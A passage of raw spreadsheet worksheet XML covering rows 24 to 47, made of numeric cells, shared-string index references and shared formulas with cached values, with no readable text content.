        <v>20</v>
      </c>
      <c r="D24" s="2" t="s">
        <v>165</v>
      </c>
      <c r="E24" s="2" t="s">
        <v>81</v>
      </c>
      <c r="F24" s="1" t="s">
        <v>159</v>
      </c>
      <c r="G24" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H24" s="1" t="s">
        <v>169</v>
      </c>
      <c r="I24" s="1" t="s">
        <v>161</v>
      </c>
      <c r="J24" s="1" t="s">
        <v>170</v>
      </c>
      <c r="K24" s="2" t="s">
        <v>168</v>
      </c>
      <c r="L24" s="1">
        <v>1.0</v>
      </c>
      <c r="M24" s="1">
        <v>1.0</v>
      </c>
      <c r="N24" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O24" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P24" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q24" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R24" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S24" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="25">
      <c r="A25" s="1">
        <v>205.0</v>
      </c>
      <c r="B25" s="2" t="s">
        <v>171</v>
      </c>
      <c r="C25" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D25" s="2" t="s">
        <v>172</v>
      </c>
      <c r="E25" s="2" t="s">
        <v>81</v>
      </c>
      <c r="F25" s="1" t="s">
        <v>159</v>
      </c>
      <c r="G25" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H25" s="4">
        <v>43993.76875</v>
      </c>
      <c r="I25" s="1" t="s">
        <v>161</v>
      </c>
      <c r="J25" s="1" t="s">
        <v>173</v>
      </c>
      <c r="K25" s="2" t="s">
        <v>174</v>
      </c>
      <c r="L25" s="1">
        <v>1.0</v>
      </c>
      <c r="M25" s="1">
        <v>1.0</v>
      </c>
      <c r="N25" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O25" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P25" s="1" t="s">
        <v>175</v>
      </c>
      <c r="Q25" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R25" s="2">
        <f t="shared" si="2"/>
        <v>11</v>
      </c>
      <c r="S25" s="1">
        <f t="shared" si="3"/>
        <v>11</v>
      </c>
    </row>
    <row r="26">
      <c r="A26" s="1">
        <v>206.0</v>
      </c>
      <c r="B26" s="2" t="s">
        <v>176</v>
      </c>
      <c r="C26" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D26" s="2" t="s">
        <v>177</v>
      </c>
      <c r="E26" s="2" t="s">
        <v>81</v>
      </c>
      <c r="F26" s="1" t="s">
        <v>159</v>
      </c>
      <c r="G26" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H26" s="4">
        <v>44531.99166666667</v>
      </c>
      <c r="I26" s="1" t="s">
        <v>161</v>
      </c>
      <c r="J26" s="1" t="s">
        <v>178</v>
      </c>
      <c r="K26" s="2" t="s">
        <v>179</v>
      </c>
      <c r="L26" s="1">
        <v>1.0</v>
      </c>
      <c r="M26" s="1">
        <v>1.0</v>
      </c>
      <c r="N26" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O26" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P26" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q26" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R26" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S26" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="27">
      <c r="A27" s="1">
        <v>208.0</v>
      </c>
      <c r="B27" s="2" t="s">
        <v>180</v>
      </c>
      <c r="C27" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D27" s="2" t="s">
        <v>181</v>
      </c>
      <c r="E27" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F27" s="1" t="s">
        <v>182</v>
      </c>
      <c r="G27" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H27" s="1" t="s">
        <v>183</v>
      </c>
      <c r="I27" s="1" t="s">
        <v>184</v>
      </c>
      <c r="J27" s="1" t="s">
        <v>185</v>
      </c>
      <c r="K27" s="2" t="s">
        <v>186</v>
      </c>
      <c r="L27" s="1">
        <v>9.0</v>
      </c>
      <c r="M27" s="1">
        <v>64.0</v>
      </c>
      <c r="N27" s="1" t="s">
        <v>187</v>
      </c>
      <c r="O27" s="1" t="s">
        <v>188</v>
      </c>
      <c r="P27" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q27" s="1">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="R27" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S27" s="1">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
    </row>
    <row r="28">
      <c r="A28" s="1">
        <v>209.0</v>
      </c>
      <c r="B28" s="2" t="s">
        <v>189</v>
      </c>
      <c r="C28" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D28" s="2" t="s">
        <v>190</v>
      </c>
      <c r="E28" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F28" s="1" t="s">
        <v>191</v>
      </c>
      <c r="G28" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H28" s="1" t="s">
        <v>192</v>
      </c>
      <c r="I28" s="1" t="s">
        <v>184</v>
      </c>
      <c r="J28" s="1" t="s">
        <v>185</v>
      </c>
      <c r="K28" s="2" t="s">
        <v>186</v>
      </c>
      <c r="L28" s="1">
        <v>9.0</v>
      </c>
      <c r="M28" s="1">
        <v>64.0</v>
      </c>
      <c r="N28" s="1" t="s">
        <v>193</v>
      </c>
      <c r="O28" s="1" t="s">
        <v>188</v>
      </c>
      <c r="P28" s="1" t="s">
        <v>194</v>
      </c>
      <c r="Q28" s="1">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="R28" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S28" s="1">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
    </row>
    <row r="29">
      <c r="A29" s="1">
        <v>236.0</v>
      </c>
      <c r="B29" s="2" t="s">
        <v>195</v>
      </c>
      <c r="C29" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D29" s="2" t="s">
        <v>196</v>
      </c>
      <c r="E29" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F29" s="1" t="s">
        <v>197</v>
      </c>
      <c r="G29" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H29" s="1" t="s">
        <v>198</v>
      </c>
      <c r="I29" s="1" t="s">
        <v>184</v>
      </c>
      <c r="J29" s="1" t="s">
        <v>185</v>
      </c>
      <c r="K29" s="2" t="s">
        <v>186</v>
      </c>
      <c r="L29" s="1">
        <v>9.0</v>
      </c>
      <c r="M29" s="1">
        <v>64.0</v>
      </c>
      <c r="N29" s="1" t="s">
        <v>199</v>
      </c>
      <c r="O29" s="1" t="s">
        <v>188</v>
      </c>
      <c r="P29" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q29" s="1">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="R29" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S29" s="1">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
    </row>
    <row r="30">
      <c r="A30" s="1">
        <v>249.0</v>
      </c>
      <c r="B30" s="2" t="s">
        <v>200</v>
      </c>
      <c r="C30" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D30" s="2" t="s">
        <v>196</v>
      </c>
      <c r="E30" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F30" s="1" t="s">
        <v>191</v>
      </c>
      <c r="G30" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H30" s="1" t="s">
        <v>201</v>
      </c>
      <c r="I30" s="1" t="s">
        <v>184</v>
      </c>
      <c r="J30" s="1" t="s">
        <v>185</v>
      </c>
      <c r="K30" s="2" t="s">
        <v>186</v>
      </c>
      <c r="L30" s="1">
        <v>9.0</v>
      </c>
      <c r="M30" s="1">
        <v>64.0</v>
      </c>
      <c r="N30" s="1" t="s">
        <v>202</v>
      </c>
      <c r="O30" s="1" t="s">
        <v>188</v>
      </c>
      <c r="P30" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q30" s="1">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="R30" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S30" s="1">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
    </row>
    <row r="31">
      <c r="A31" s="1">
        <v>250.0</v>
      </c>
      <c r="B31" s="2" t="s">
        <v>203</v>
      </c>
      <c r="C31" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D31" s="2" t="s">
        <v>196</v>
      </c>
      <c r="E31" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F31" s="1" t="s">
        <v>191</v>
      </c>
      <c r="G31" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H31" s="1" t="s">
        <v>204</v>
      </c>
      <c r="I31" s="1" t="s">
        <v>184</v>
      </c>
      <c r="J31" s="1" t="s">
        <v>185</v>
      </c>
      <c r="K31" s="2" t="s">
        <v>186</v>
      </c>
      <c r="L31" s="1">
        <v>9.0</v>
      </c>
      <c r="M31" s="1">
        <v>64.0</v>
      </c>
      <c r="N31" s="1" t="s">
        <v>205</v>
      </c>
      <c r="O31" s="1" t="s">
        <v>188</v>
      </c>
      <c r="P31" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q31" s="1">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="R31" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S31" s="1">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
    </row>
    <row r="32">
      <c r="A32" s="1">
        <v>270.0</v>
      </c>
      <c r="B32" s="2" t="s">
        <v>206</v>
      </c>
      <c r="C32" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D32" s="2" t="s">
        <v>196</v>
      </c>
      <c r="E32" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F32" s="1" t="s">
        <v>207</v>
      </c>
      <c r="G32" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H32" s="1" t="s">
        <v>208</v>
      </c>
      <c r="I32" s="1" t="s">
        <v>184</v>
      </c>
      <c r="J32" s="1" t="s">
        <v>185</v>
      </c>
      <c r="K32" s="2" t="s">
        <v>186</v>
      </c>
      <c r="L32" s="1">
        <v>9.0</v>
      </c>
      <c r="M32" s="1">
        <v>64.0</v>
      </c>
      <c r="N32" s="1" t="s">
        <v>187</v>
      </c>
      <c r="O32" s="1" t="s">
        <v>188</v>
      </c>
      <c r="P32" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q32" s="1">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="R32" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S32" s="1">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
    </row>
    <row r="33">
      <c r="A33" s="1">
        <v>271.0</v>
      </c>
      <c r="B33" s="2" t="s">
        <v>209</v>
      </c>
      <c r="C33" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D33" s="2" t="s">
        <v>210</v>
      </c>
      <c r="E33" s="2" t="s">
        <v>81</v>
      </c>
      <c r="F33" s="1" t="s">
        <v>159</v>
      </c>
      <c r="G33" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H33" s="1" t="s">
        <v>211</v>
      </c>
      <c r="I33" s="1" t="s">
        <v>161</v>
      </c>
      <c r="J33" s="1" t="s">
        <v>212</v>
      </c>
      <c r="K33" s="2" t="s">
        <v>213</v>
      </c>
      <c r="L33" s="1">
        <v>2.0</v>
      </c>
      <c r="M33" s="1">
        <v>2.0</v>
      </c>
      <c r="N33" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O33" s="1" t="s">
        <v>214</v>
      </c>
      <c r="P33" s="1" t="s">
        <v>215</v>
      </c>
      <c r="Q33" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R33" s="2">
        <f t="shared" si="2"/>
        <v>11</v>
      </c>
      <c r="S33" s="1">
        <f t="shared" si="3"/>
        <v>11</v>
      </c>
    </row>
    <row r="34">
      <c r="A34" s="1">
        <v>297.0</v>
      </c>
      <c r="B34" s="2" t="s">
        <v>216</v>
      </c>
      <c r="C34" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D34" s="2" t="s">
        <v>217</v>
      </c>
      <c r="E34" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F34" s="1" t="s">
        <v>218</v>
      </c>
      <c r="G34" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H34" s="1" t="s">
        <v>219</v>
      </c>
      <c r="I34" s="1" t="s">
        <v>220</v>
      </c>
      <c r="J34" s="1" t="s">
        <v>221</v>
      </c>
      <c r="K34" s="2" t="s">
        <v>222</v>
      </c>
      <c r="L34" s="1">
        <v>23.0</v>
      </c>
      <c r="M34" s="1">
        <v>45.0</v>
      </c>
      <c r="N34" s="1" t="s">
        <v>223</v>
      </c>
      <c r="O34" s="1" t="s">
        <v>224</v>
      </c>
      <c r="P34" s="1" t="s">
        <v>225</v>
      </c>
      <c r="Q34" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R34" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S34" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="35">
      <c r="A35" s="1">
        <v>298.0</v>
      </c>
      <c r="B35" s="2" t="s">
        <v>226</v>
      </c>
      <c r="C35" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D35" s="2" t="s">
        <v>227</v>
      </c>
      <c r="E35" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F35" s="1" t="s">
        <v>228</v>
      </c>
      <c r="G35" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H35" s="1" t="s">
        <v>229</v>
      </c>
      <c r="I35" s="1" t="s">
        <v>220</v>
      </c>
      <c r="J35" s="1" t="s">
        <v>221</v>
      </c>
      <c r="K35" s="2" t="s">
        <v>222</v>
      </c>
      <c r="L35" s="1">
        <v>23.0</v>
      </c>
      <c r="M35" s="1">
        <v>45.0</v>
      </c>
      <c r="N35" s="1" t="s">
        <v>230</v>
      </c>
      <c r="O35" s="1" t="s">
        <v>224</v>
      </c>
      <c r="P35" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q35" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R35" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S35" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="36">
      <c r="A36" s="1">
        <v>299.0</v>
      </c>
      <c r="B36" s="2" t="s">
        <v>231</v>
      </c>
      <c r="C36" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D36" s="2" t="s">
        <v>227</v>
      </c>
      <c r="E36" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F36" s="1" t="s">
        <v>232</v>
      </c>
      <c r="G36" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H36" s="1" t="s">
        <v>233</v>
      </c>
      <c r="I36" s="1" t="s">
        <v>220</v>
      </c>
      <c r="J36" s="1" t="s">
        <v>221</v>
      </c>
      <c r="K36" s="2" t="s">
        <v>222</v>
      </c>
      <c r="L36" s="1">
        <v>23.0</v>
      </c>
      <c r="M36" s="1">
        <v>45.0</v>
      </c>
      <c r="N36" s="1" t="s">
        <v>234</v>
      </c>
      <c r="O36" s="1" t="s">
        <v>224</v>
      </c>
      <c r="P36" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q36" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R36" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S36" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="37">
      <c r="A37" s="1">
        <v>300.0</v>
      </c>
      <c r="B37" s="2" t="s">
        <v>235</v>
      </c>
      <c r="C37" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D37" s="2" t="s">
        <v>227</v>
      </c>
      <c r="E37" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F37" s="1" t="s">
        <v>232</v>
      </c>
      <c r="G37" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H37" s="1" t="s">
        <v>236</v>
      </c>
      <c r="I37" s="1" t="s">
        <v>220</v>
      </c>
      <c r="J37" s="1" t="s">
        <v>221</v>
      </c>
      <c r="K37" s="2" t="s">
        <v>222</v>
      </c>
      <c r="L37" s="1">
        <v>23.0</v>
      </c>
      <c r="M37" s="1">
        <v>45.0</v>
      </c>
      <c r="N37" s="1" t="s">
        <v>237</v>
      </c>
      <c r="O37" s="1" t="s">
        <v>224</v>
      </c>
      <c r="P37" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q37" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R37" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S37" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="38">
      <c r="A38" s="1">
        <v>301.0</v>
      </c>
      <c r="B38" s="2" t="s">
        <v>238</v>
      </c>
      <c r="C38" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D38" s="2" t="s">
        <v>227</v>
      </c>
      <c r="E38" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F38" s="1" t="s">
        <v>232</v>
      </c>
      <c r="G38" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H38" s="1" t="s">
        <v>239</v>
      </c>
      <c r="I38" s="1" t="s">
        <v>220</v>
      </c>
      <c r="J38" s="1" t="s">
        <v>221</v>
      </c>
      <c r="K38" s="2" t="s">
        <v>222</v>
      </c>
      <c r="L38" s="1">
        <v>23.0</v>
      </c>
      <c r="M38" s="1">
        <v>45.0</v>
      </c>
      <c r="N38" s="1" t="s">
        <v>202</v>
      </c>
      <c r="O38" s="1" t="s">
        <v>224</v>
      </c>
      <c r="P38" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q38" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R38" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S38" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="39">
      <c r="A39" s="1">
        <v>318.0</v>
      </c>
      <c r="B39" s="2" t="s">
        <v>240</v>
      </c>
      <c r="C39" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D39" s="2" t="s">
        <v>241</v>
      </c>
      <c r="E39" s="2" t="s">
        <v>242</v>
      </c>
      <c r="F39" s="1" t="s">
        <v>243</v>
      </c>
      <c r="G39" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H39" s="1" t="s">
        <v>244</v>
      </c>
      <c r="I39" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J39" s="1" t="s">
        <v>245</v>
      </c>
      <c r="K39" s="2" t="s">
        <v>246</v>
      </c>
      <c r="L39" s="1">
        <v>8.0</v>
      </c>
      <c r="M39" s="1">
        <v>8.0</v>
      </c>
      <c r="N39" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O39" s="1" t="s">
        <v>247</v>
      </c>
      <c r="P39" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q39" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R39" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S39" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="40">
      <c r="A40" s="1">
        <v>319.0</v>
      </c>
      <c r="B40" s="2" t="s">
        <v>248</v>
      </c>
      <c r="C40" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D40" s="2" t="s">
        <v>249</v>
      </c>
      <c r="E40" s="2" t="s">
        <v>135</v>
      </c>
      <c r="F40" s="1" t="s">
        <v>250</v>
      </c>
      <c r="G40" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H40" s="1" t="s">
        <v>251</v>
      </c>
      <c r="I40" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J40" s="1" t="s">
        <v>245</v>
      </c>
      <c r="K40" s="2" t="s">
        <v>246</v>
      </c>
      <c r="L40" s="1">
        <v>8.0</v>
      </c>
      <c r="M40" s="1">
        <v>8.0</v>
      </c>
      <c r="N40" s="1" t="s">
        <v>252</v>
      </c>
      <c r="O40" s="1" t="s">
        <v>247</v>
      </c>
      <c r="P40" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q40" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R40" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S40" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="41">
      <c r="A41" s="1">
        <v>320.0</v>
      </c>
      <c r="B41" s="2" t="s">
        <v>253</v>
      </c>
      <c r="C41" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D41" s="2" t="s">
        <v>254</v>
      </c>
      <c r="E41" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F41" s="1" t="s">
        <v>255</v>
      </c>
      <c r="G41" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H41" s="1" t="s">
        <v>256</v>
      </c>
      <c r="I41" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J41" s="1" t="s">
        <v>245</v>
      </c>
      <c r="K41" s="2" t="s">
        <v>246</v>
      </c>
      <c r="L41" s="1">
        <v>8.0</v>
      </c>
      <c r="M41" s="1">
        <v>8.0</v>
      </c>
      <c r="N41" s="1" t="s">
        <v>205</v>
      </c>
      <c r="O41" s="1" t="s">
        <v>247</v>
      </c>
      <c r="P41" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q41" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R41" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S41" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="42">
      <c r="A42" s="1">
        <v>321.0</v>
      </c>
      <c r="B42" s="2" t="s">
        <v>257</v>
      </c>
      <c r="C42" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D42" s="2" t="s">
        <v>254</v>
      </c>
      <c r="E42" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F42" s="1" t="s">
        <v>258</v>
      </c>
      <c r="G42" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H42" s="1" t="s">
        <v>259</v>
      </c>
      <c r="I42" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J42" s="1" t="s">
        <v>245</v>
      </c>
      <c r="K42" s="2" t="s">
        <v>246</v>
      </c>
      <c r="L42" s="1">
        <v>8.0</v>
      </c>
      <c r="M42" s="1">
        <v>8.0</v>
      </c>
      <c r="N42" s="1" t="s">
        <v>260</v>
      </c>
      <c r="O42" s="1" t="s">
        <v>247</v>
      </c>
      <c r="P42" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q42" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R42" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S42" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="43">
      <c r="A43" s="1">
        <v>324.0</v>
      </c>
      <c r="B43" s="2" t="s">
        <v>261</v>
      </c>
      <c r="C43" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D43" s="2" t="s">
        <v>254</v>
      </c>
      <c r="E43" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F43" s="1" t="s">
        <v>262</v>
      </c>
      <c r="G43" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H43" s="1" t="s">
        <v>263</v>
      </c>
      <c r="I43" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J43" s="1" t="s">
        <v>245</v>
      </c>
      <c r="K43" s="2" t="s">
        <v>246</v>
      </c>
      <c r="L43" s="1">
        <v>8.0</v>
      </c>
      <c r="M43" s="1">
        <v>8.0</v>
      </c>
      <c r="N43" s="1" t="s">
        <v>264</v>
      </c>
      <c r="O43" s="1" t="s">
        <v>247</v>
      </c>
      <c r="P43" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q43" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R43" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S43" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="44">
      <c r="A44" s="1">
        <v>325.0</v>
      </c>
      <c r="B44" s="2" t="s">
        <v>265</v>
      </c>
      <c r="C44" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D44" s="2" t="s">
        <v>254</v>
      </c>
      <c r="E44" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F44" s="1" t="s">
        <v>266</v>
      </c>
      <c r="G44" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H44" s="1" t="s">
        <v>267</v>
      </c>
      <c r="I44" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J44" s="1" t="s">
        <v>245</v>
      </c>
      <c r="K44" s="2" t="s">
        <v>246</v>
      </c>
      <c r="L44" s="1">
        <v>8.0</v>
      </c>
      <c r="M44" s="1">
        <v>8.0</v>
      </c>
      <c r="N44" s="1" t="s">
        <v>268</v>
      </c>
      <c r="O44" s="1" t="s">
        <v>247</v>
      </c>
      <c r="P44" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q44" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R44" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S44" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="45">
      <c r="A45" s="1">
        <v>359.0</v>
      </c>
      <c r="B45" s="2" t="s">
        <v>269</v>
      </c>
      <c r="C45" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D45" s="2" t="s">
        <v>270</v>
      </c>
      <c r="E45" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F45" s="1" t="s">
        <v>271</v>
      </c>
      <c r="G45" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H45" s="1" t="s">
        <v>272</v>
      </c>
      <c r="I45" s="1" t="s">
        <v>273</v>
      </c>
      <c r="J45" s="1" t="s">
        <v>274</v>
      </c>
      <c r="K45" s="2" t="s">
        <v>275</v>
      </c>
      <c r="L45" s="1">
        <v>5.0</v>
      </c>
      <c r="M45" s="1">
        <v>9.0</v>
      </c>
      <c r="N45" s="1" t="s">
        <v>276</v>
      </c>
      <c r="O45" s="1" t="s">
        <v>277</v>
      </c>
      <c r="P45" s="1" t="s">
        <v>194</v>
      </c>
      <c r="Q45" s="1">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="R45" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S45" s="1">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
    </row>
    <row r="46">
      <c r="A46" s="1">
        <v>362.0</v>
      </c>
      <c r="B46" s="2" t="s">
        <v>278</v>
      </c>
      <c r="C46" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D46" s="2" t="s">
        <v>279</v>
      </c>
      <c r="E46" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F46" s="1" t="s">
        <v>271</v>
      </c>
      <c r="G46" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H46" s="1" t="s">
        <v>280</v>
      </c>
      <c r="I46" s="1" t="s">
        <v>273</v>
      </c>
      <c r="J46" s="1" t="s">
        <v>274</v>
      </c>
      <c r="K46" s="2" t="s">
        <v>275</v>
      </c>
      <c r="L46" s="1">
        <v>5.0</v>
      </c>
      <c r="M46" s="1">
        <v>9.0</v>
      </c>
      <c r="N46" s="1" t="s">
        <v>281</v>
      </c>
      <c r="O46" s="1" t="s">
        <v>277</v>
      </c>
      <c r="P46" s="1" t="s">
        <v>194</v>
      </c>
      <c r="Q46" s="1">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="R46" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S46" s="1">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
    </row>
    <row r="47">
      <c r="A47" s="1">
        <v>364.0</v>
      </c>
      <c r="B47" s="2" t="s">
        <v>282</v>
      </c>
      <c r="C47" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D47" s="2" t="s">
        <v>270</v>
      </c>
      <c r="E47" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F47" s="1" t="s">
        <v>283</v>
      </c>
      <c r="G47" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H47" s="1" t="s">
        <v>284</v>
      </c>
      <c r="I47" s="1" t="s">
        <v>273</v>
      </c>
      <c r="J47" s="1" t="s">
        <v>274</v>
      </c>
      <c r="K47" s="2" t="s">
        <v>275</v>
      </c>
      <c r="L47" s="1">
        <v>5.0</v>
      </c>
      <c r="M47" s="1">
        <v>9.0</v>
      </c>
      <c r="N47" s="1" t="s">
        <v>285</v>
      </c>
      <c r="O47" s="1" t="s">
        <v>277</v>
      </c>
      <c r="P47" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q47" s="1">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="R47" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
